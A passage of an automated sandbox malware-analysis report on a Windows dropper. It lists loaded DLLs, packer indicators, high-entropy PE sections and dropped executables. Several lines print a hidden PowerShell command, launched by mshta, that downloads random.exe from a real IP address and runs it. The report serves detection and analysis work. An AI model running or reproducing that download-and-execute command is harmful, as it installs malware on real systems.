                                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                                    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
                                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeSection loaded: mscoree.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeSection loaded: apphelp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeSection loaded: version.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeSection loaded: wldp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeSection loaded: winhttp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeSection loaded: webio.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeSection loaded: mswsock.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeSection loaded: iphlpapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeSection loaded: winnsi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeSection loaded: dnsapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeSection loaded: rasadhlp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeSection loaded: schannel.dll
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeSection loaded: mskeyprotect.dll
                                    Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                                    Source: random.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: random.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: random.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: random.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: random.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: random.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: random.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb source: V0Bt74c.exe, 00000031.00000000.3147603020.00000000001E2000.00000002.00000001.01000000.00000015.sdmp, V0Bt74c.exe, 00000031.00000002.3270950302.0000000003549000.00000004.00000800.00020000.00000000.sdmp, PfOHmro.exe.14.dr, PfOHmro[1].exe.14.dr, V0Bt74c.exe.14.dr
                                    Source: Binary string: CallSite.Target.pdb source: powershell.exe, 00000008.00000002.1319444757.00000287A8E77000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: Hpdbtem.pdbe- source: powershell.exe, 00000008.00000002.1316835189.00000287A8BA4000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: Portals.pdb source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: System.Windows.Forms.pdb source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: ows\dll\mscorlib.pdb source: powershell.exe, 00000008.00000002.1316835189.00000287A8BA4000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: mscorlib.pdb source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: System.ni.pdbRSDS source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: Through.pdb source: mAtJWNv.exe.14.dr, mAtJWNv[1].exe.14.dr
                                    Source: Binary string: mscorlib.ni.pdb source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: System.pdb) source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: RegAsm.pdb source: RegAsm.exe.41.dr
                                    Source: Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb<;V; H;_CorExeMainmscoree.dll source: V0Bt74c.exe, 00000031.00000000.3147603020.00000000001E2000.00000002.00000001.01000000.00000015.sdmp, V0Bt74c.exe, 00000031.00000002.3270950302.0000000003549000.00000004.00000800.00020000.00000000.sdmp, PfOHmro.exe.14.dr, PfOHmro[1].exe.14.dr, V0Bt74c.exe.14.dr
                                    Source: Binary string: RegAsm.pdb4 source: RegAsm.exe.41.dr
                                    Source: Binary string: mscorlib.ni.pdbRSDS source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: Portals.pdbIL_STUB_PInvoke source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: b.pdb source: powershell.exe, 00000008.00000002.1316835189.00000287A8BA4000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: System.ni.pdb source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: System.pdb source: WER1FC2.tmp.dmp.54.dr
                                    Source: Binary string: System.pdb.pdb source: powershell.exe, 00000008.00000002.1316835189.00000287A8BA4000.00000004.00000020.00020000.00000000.sdmp
                                    Source: random.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: random.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: random.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: random.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: random.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                    Data Obfuscation

                                    barindex
                                    Detected unpacking (changes PE section rights)
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEUnpacked PE file: 11.2.TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.310000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW;
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEUnpacked PE file: 12.2.TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.310000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW;
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeUnpacked PE file: 13.2.rapes.exe.30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW;
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeUnpacked PE file: 14.2.rapes.exe.30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW;
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeUnpacked PE file: 22.2.rapes.exe.30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW;
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeUnpacked PE file: 25.2.rapes.exe.30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW;
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeUnpacked PE file: 27.2.rapes.exe.30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW;
                                    .NET source code contains method to dynamically call methods (often used by packers)
                                    Source: mAtJWNv[1].exe.14.dr, Ce716WgjPJi1to0DwO.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{lMyWdMdzSHL952Z0EGd(typeof(IntPtr).TypeHandle),lMyWdMdzSHL952Z0EGd(typeof(Type).TypeHandle)})
                                    Source: mAtJWNv.exe.14.dr, Ce716WgjPJi1to0DwO.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{lMyWdMdzSHL952Z0EGd(typeof(IntPtr).TypeHandle),lMyWdMdzSHL952Z0EGd(typeof(Type).TypeHandle)})
                                    .NET source code contains potential unpacker
                                    Source: mAtJWNv[1].exe.14.dr, RhN4VuXG0bkU6RkQbjv.cs.Net Code: NA4BaGdVL2
                                    Source: mAtJWNv[1].exe.14.dr, RhN4VuXG0bkU6RkQbjv.cs.Net Code: D0mHsQPh9h
                                    Source: mAtJWNv.exe.14.dr, RhN4VuXG0bkU6RkQbjv.cs.Net Code: NA4BaGdVL2
                                    Source: mAtJWNv.exe.14.dr, RhN4VuXG0bkU6RkQbjv.cs.Net Code: D0mHsQPh9h
                                    Suspicious powershell command line found
                                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                                    Source: V0Bt74c[1].exe.14.drStatic PE information: 0xADFF511F [Mon Jul 3 22:20:15 2062 UTC]
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004242DE
                                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                                    Source: rapes.exe.11.drStatic PE information: real checksum: 0x1e3d54 should be: 0x1e65ec
                                    Source: yUI6F6C.exe.14.drStatic PE information: real checksum: 0x1fe9f5 should be: 0x1f9dcb
                                    Source: zY9sqWs[1].exe.14.drStatic PE information: real checksum: 0x0 should be: 0x78f31
                                    Source: V0Bt74c[1].exe.14.drStatic PE information: real checksum: 0x0 should be: 0x5f210
                                    Source: ADFoyxP.exe.14.drStatic PE information: real checksum: 0x381fe3 should be: 0x3875ef
                                    Source: ReK7Ewx.exe.14.drStatic PE information: real checksum: 0x0 should be: 0x14350a
                                    Source: V0Bt74c.exe.14.drStatic PE information: real checksum: 0x0 should be: 0x5f210
                                    Source: CgmaT61.exe.14.drStatic PE information: real checksum: 0x1fe9f5 should be: 0x1f9dcb
                                    Source: yUI6F6C[1].exe.14.drStatic PE information: real checksum: 0x1fe9f5 should be: 0x1f9dcb
                                    Source: zY9sqWs.exe.14.drStatic PE information: real checksum: 0x0 should be: 0x78f31
                                    Source: ReK7Ewx[1].exe.14.drStatic PE information: real checksum: 0x0 should be: 0x14350a
                                    Source: ADFoyxP[1].exe.14.drStatic PE information: real checksum: 0x381fe3 should be: 0x3875ef
                                    Source: PfOHmro[1].exe.14.drStatic PE information: real checksum: 0x0 should be: 0x202bf
                                    Source: CgmaT61[1].exe.14.drStatic PE information: real checksum: 0x1fe9f5 should be: 0x1f9dcb
                                    Source: PfOHmro.exe.14.drStatic PE information: real checksum: 0x0 should be: 0x202bf
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.5.drStatic PE information: real checksum: 0x1e3d54 should be: 0x1e65ec
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.5.drStatic PE information: section name:
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.5.drStatic PE information: section name: .idata
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.5.drStatic PE information: section name:
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.5.drStatic PE information: section name: zmpqmbag
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.5.drStatic PE information: section name: jncfbsbi
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.5.drStatic PE information: section name: .taggant
                                    Source: rapes.exe.11.drStatic PE information: section name:
                                    Source: rapes.exe.11.drStatic PE information: section name: .idata
                                    Source: rapes.exe.11.drStatic PE information: section name:
                                    Source: rapes.exe.11.drStatic PE information: section name: zmpqmbag
                                    Source: rapes.exe.11.drStatic PE information: section name: jncfbsbi
                                    Source: rapes.exe.11.drStatic PE information: section name: .taggant
                                    Source: V0Bt74c[1].exe.14.drStatic PE information: section name: .CSS
                                    Source: V0Bt74c.exe.14.drStatic PE information: section name: .CSS
                                    Source: yUI6F6C[1].exe.14.drStatic PE information: section name:
                                    Source: yUI6F6C[1].exe.14.drStatic PE information: section name: .idata
                                    Source: yUI6F6C[1].exe.14.drStatic PE information: section name:
                                    Source: yUI6F6C[1].exe.14.drStatic PE information: section name: mzhehwmc
                                    Source: yUI6F6C[1].exe.14.drStatic PE information: section name: roelxloa
                                    Source: yUI6F6C[1].exe.14.drStatic PE information: section name: .taggant
                                    Source: yUI6F6C.exe.14.drStatic PE information: section name:
                                    Source: yUI6F6C.exe.14.drStatic PE information: section name: .idata
                                    Source: yUI6F6C.exe.14.drStatic PE information: section name:
                                    Source: yUI6F6C.exe.14.drStatic PE information: section name: mzhehwmc
                                    Source: yUI6F6C.exe.14.drStatic PE information: section name: roelxloa
                                    Source: yUI6F6C.exe.14.drStatic PE information: section name: .taggant
                                    Source: CgmaT61[1].exe.14.drStatic PE information: section name:
                                    Source: CgmaT61[1].exe.14.drStatic PE information: section name: .idata
                                    Source: CgmaT61[1].exe.14.drStatic PE information: section name:
                                    Source: CgmaT61[1].exe.14.drStatic PE information: section name: mzhehwmc
                                    Source: CgmaT61[1].exe.14.drStatic PE information: section name: roelxloa
                                    Source: CgmaT61[1].exe.14.drStatic PE information: section name: .taggant
                                    Source: CgmaT61.exe.14.drStatic PE information: section name:
                                    Source: CgmaT61.exe.14.drStatic PE information: section name: .idata
                                    Source: CgmaT61.exe.14.drStatic PE information: section name:
                                    Source: CgmaT61.exe.14.drStatic PE information: section name: mzhehwmc
                                    Source: CgmaT61.exe.14.drStatic PE information: section name: roelxloa
                                    Source: CgmaT61.exe.14.drStatic PE information: section name: .taggant
                                    Source: mAtJWNv[1].exe.14.drStatic PE information: section name: .css
                                    Source: mAtJWNv.exe.14.drStatic PE information: section name: .css
                                    Source: PfOHmro[1].exe.14.drStatic PE information: section name: .CSS
                                    Source: PfOHmro.exe.14.drStatic PE information: section name: .CSS
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00440A76 push ecx; ret 0_2_00440A89
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_000A359F push ecx; mov dword ptr [esp], 69502F73h13_1_000A4323
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021CC24 push 0805FA11h; mov dword ptr [esp], edx13_1_0021CC50
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021CC24 push 1C771B66h; mov dword ptr [esp], eax13_1_0021CC67
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021CC24 push ebx; mov dword ptr [esp], 00207EB7h13_1_0021CD5C
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021CC24 push 0F1C6EF5h; mov dword ptr [esp], eax13_1_0021CDAA
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021CC24 push eax; mov dword ptr [esp], edi13_1_0021CE2E
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021CC24 push 412935C5h; mov dword ptr [esp], edx13_1_0021CEB1
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021CC24 push ecx; mov dword ptr [esp], esi13_1_0021CEBA
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021CC24 push 7C7D4E27h; mov dword ptr [esp], ecx13_1_0021CED8
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021CC24 push ecx; mov dword ptr [esp], eax13_1_0021CF1D
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021CC24 push esi; mov dword ptr [esp], 6EFBACB7h13_1_0021CF5A
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021CC24 push 721AE353h; mov dword ptr [esp], esi13_1_0021CF8C
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021CC24 push ecx; mov dword ptr [esp], edx13_1_0021CFDA
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021CC24 push edx; mov dword ptr [esp], esi13_1_0021D034
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021CC24 push esi; mov dword ptr [esp], edx13_1_0021D087
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021CC24 push ebx; mov dword ptr [esp], edx13_1_0021D0A0
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021CC24 push edx; mov dword ptr [esp], edi13_1_0021D12F
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021CC24 push ebp; mov dword ptr [esp], ecx13_1_0021D182
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021CC24 push 28ECE369h; mov dword ptr [esp], edi13_1_0021D18B
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021CC24 push edi; mov dword ptr [esp], ebx13_1_0021D1F1
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021CC24 push ecx; mov dword ptr [esp], eax13_1_0021D21D
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021CC24 push 597DE88Dh; mov dword ptr [esp], ebp13_1_0021D25B
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021CC24 push ebx; mov dword ptr [esp], esi13_1_0021D308
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021CC24 push 24AE1FB3h; mov dword ptr [esp], ebx13_1_0021D327
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021CC24 push ebx; mov dword ptr [esp], ebp13_1_0021D385
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021CC24 push 4B80EA00h; mov dword ptr [esp], ebx13_1_0021D439
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021CC24 push eax; mov dword ptr [esp], 65C85347h13_1_0021D455
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021CC24 push ebp; mov dword ptr [esp], 68CF75F2h13_1_0021D4D7
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021CC24 push 732395FEh; mov dword ptr [esp], eax13_1_0021D544
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 13_1_0021CC24 push 26A4CF86h; mov dword ptr [esp], edx13_1_0021D607
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.5.drStatic PE information: section name: entropy: 7.9846762099294
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.5.drStatic PE information: section name: zmpqmbag entropy: 7.952831791896438
                                    Source: rapes.exe.11.drStatic PE information: section name: entropy: 7.9846762099294
                                    Source: rapes.exe.11.drStatic PE information: section name: zmpqmbag entropy: 7.952831791896438
                                    Source: yUI6F6C[1].exe.14.drStatic PE information: section name: entropy: 7.169833059547756
                                    Source: yUI6F6C[1].exe.14.drStatic PE information: section name: mzhehwmc entropy: 7.953537250716954
                                    Source: yUI6F6C.exe.14.drStatic PE information: section name: entropy: 7.169833059547756
                                    Source: yUI6F6C.exe.14.drStatic PE information: section name: mzhehwmc entropy: 7.953537250716954
                                    Source: CgmaT61[1].exe.14.drStatic PE information: section name: entropy: 7.169833059547756
                                    Source: CgmaT61[1].exe.14.drStatic PE information: section name: mzhehwmc entropy: 7.953537250716954
                                    Source: CgmaT61.exe.14.drStatic PE information: section name: entropy: 7.169833059547756
                                    Source: CgmaT61.exe.14.drStatic PE information: section name: mzhehwmc entropy: 7.953537250716954
                                    Source: mAtJWNv[1].exe.14.dr, Ce716WgjPJi1to0DwO.csHigh entropy of concatenated method names: 'eGZi6juOTvHuM3AqcMT', 'QImVx8u9prVJ6Q5ZhQE', 'xb8D5o8ice', 'fJWJrPuWkv2n2wknEjv', 'uGltkNu6BSessyYBViZ', 'C12RuXuxuWYaGcE7Doo', 'KO2BOSuQ5hwVCjxjiju', 'zgeLtquCOOSgYpfX44p', 'gjwjUouM8jUopDwUTXY', 'l52Wk9u0T44L3mo9PjS'
                                    Source: mAtJWNv[1].exe.14.dr, gCnUgIvQu4UM8Qqkpr.csHigh entropy of concatenated method names: 'WKqgG71Jxr', 'GjNGI3dLvTpx0QRqhsw', 'jtT0jOdcN9fvs9pFR08', 'rRv5uvdqXA0lhjq3uIo', 'skpWCGdM30wyvKEnUVd', 'iBhaNId0SrTCk4ETfBw', 'b6ZCYEdG35m0wuZYCm6', 'BOeTaHdyC6WjDBnT867', 'CJ56DkdKD03B6aTUjsf'
                                    Source: mAtJWNv[1].exe.14.dr, RhN4VuXG0bkU6RkQbjv.csHigh entropy of concatenated method names: 'oOrTcWmPb5', 'NH0TqtpkSe', 'omwTGnVxjh', 'iGWTyYs8lA', 'lU4TKZlNmh', 'e5STIWmrST', 'YeYTRC9Ljo', 'kQvXZ7gBkT', 'iOITUqHIfj', 'Fh4T2okLG1'
                                    Source: mAtJWNv.exe.14.dr, Ce716WgjPJi1to0DwO.csHigh entropy of concatenated method names: 'eGZi6juOTvHuM3AqcMT', 'QImVx8u9prVJ6Q5ZhQE', 'xb8D5o8ice', 'fJWJrPuWkv2n2wknEjv', 'uGltkNu6BSessyYBViZ', 'C12RuXuxuWYaGcE7Doo', 'KO2BOSuQ5hwVCjxjiju', 'zgeLtquCOOSgYpfX44p', 'gjwjUouM8jUopDwUTXY', 'l52Wk9u0T44L3mo9PjS'
                                    Source: mAtJWNv.exe.14.dr, gCnUgIvQu4UM8Qqkpr.csHigh entropy of concatenated method names: 'WKqgG71Jxr', 'GjNGI3dLvTpx0QRqhsw', 'jtT0jOdcN9fvs9pFR08', 'rRv5uvdqXA0lhjq3uIo', 'skpWCGdM30wyvKEnUVd', 'iBhaNId0SrTCk4ETfBw', 'b6ZCYEdG35m0wuZYCm6', 'BOeTaHdyC6WjDBnT867', 'CJ56DkdKD03B6aTUjsf'
                                    Source: mAtJWNv.exe.14.dr, RhN4VuXG0bkU6RkQbjv.csHigh entropy of concatenated method names: 'oOrTcWmPb5', 'NH0TqtpkSe', 'omwTGnVxjh', 'iGWTyYs8lA', 'lU4TKZlNmh', 'e5STIWmrST', 'YeYTRC9Ljo', 'kQvXZ7gBkT', 'iOITUqHIfj', 'Fh4T2okLG1'

                                    Persistence and Installation Behavior

                                    barindex
                                    Drops PE files with a suspicious file extension
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comFile created: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.comJump to dropped file
                                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\789919\Occupation.comJump to dropped file
                                    Tries to download and execute files (via powershell)
                                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10141820101\mAtJWNv.exeJump to dropped file
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEJump to dropped file
